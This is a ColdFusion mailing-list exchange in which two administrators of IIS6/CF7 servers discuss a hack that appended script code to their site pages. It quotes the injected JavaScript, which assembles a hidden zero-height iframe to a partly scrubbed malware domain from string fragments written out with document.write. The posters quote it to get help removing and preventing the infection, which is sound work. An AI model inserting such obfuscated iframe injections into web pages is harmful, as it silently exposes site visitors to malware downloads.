Nick: We have been attacked by the exact same hack. We discovered it on April 6 and it has proven impossible to clean/remove.
I have read through this thread, but I don't see where you found anything specifically causing the problem. We are also using IIS6 and CF7 and have approx 300 sites on this shared webserver. We are having to scrub our files to remove the injected code (which is being written directly to the files as the result of the hack allowing "FULL CONTROL" for the Everyone user on the machine. Have you determined a solution for removing/preventing this? Let me know. JB >Hi there. We've just seen a hack attempt that we haven't seen before and I >wanted to get feedback. > >The symptom is that some script code is inserted at the bottom of certain >pages (e.g. index.cfm). The script (which has been scrubbed) looks like >this: ><script><!-- > var applstrna0 = "<if"; > var applstrna1 = "rame src=http://said7";; > var applstrna2 = ".[BAD URL HERE]"; > var applstrna3 = " width=100 height=0></i"; > var applstrna4 = "frame>"; >document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4); >//--></script> > >The script downloads malware, which we obviously want to prevent. We're >trying to determine how it's getting in their, whether through an old site >with inadequate code or the OS or something else. Any thoughts? > >This is on a server running IIS 6 / CF7. > >Thanks in advance, > >Nick ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321518 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
